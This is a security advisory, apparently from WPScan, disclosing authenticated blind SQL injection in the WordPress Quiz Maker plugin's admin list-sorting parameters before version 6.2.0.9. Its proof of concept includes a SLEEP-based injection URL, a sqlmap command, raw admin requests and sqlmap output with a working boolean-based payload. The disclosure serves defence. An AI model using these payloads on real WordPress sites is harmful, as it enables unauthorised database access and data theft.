Quiz Maker < 6.2.0.9 - Multiple Authenticated Blind SQL Injections

The plugin did not properly sanitise and escape the order and orderby parameters before using them in SQL statements, leading to SQL injection issues in the admin dashboard When we (WPScanTeam) confirmed the issues, more SQL Injections were identified, reported and fixed by the vendor but have not been detailed here.

PoC

All the files in includes/lists/ were affected and the PoC below are just examples of them https://example.com/wp-admin/admin.php?page=quiz-maker-question-categories&amp;orderby;=title AND (SELECT 6418 FROM (SELECT(SLEEP(5)))PLuH)&order;=asc SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs With r.txt is GET OR POST requests to sort quiz: GET /wp-admin/admin.php?page=quiz-maker&orderby;=id–&order;=desc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 OR : POST /wp-admin/admin.php?page=quiz-maker HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Connection: close Cookie: [admin+] orderby=id–&order;=desc&s;=d&action;=-1&paged;=1&filterby-top;=&action2;=-1&filterby-bottom;= SQLMAP OUTPUT: -– Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=quiz-maker&orderby;=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order;=asc -– [22:38:25] [INFO] testing MySQL [22:38:25] [INFO] confirming MySQL [22:38:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 8.0.0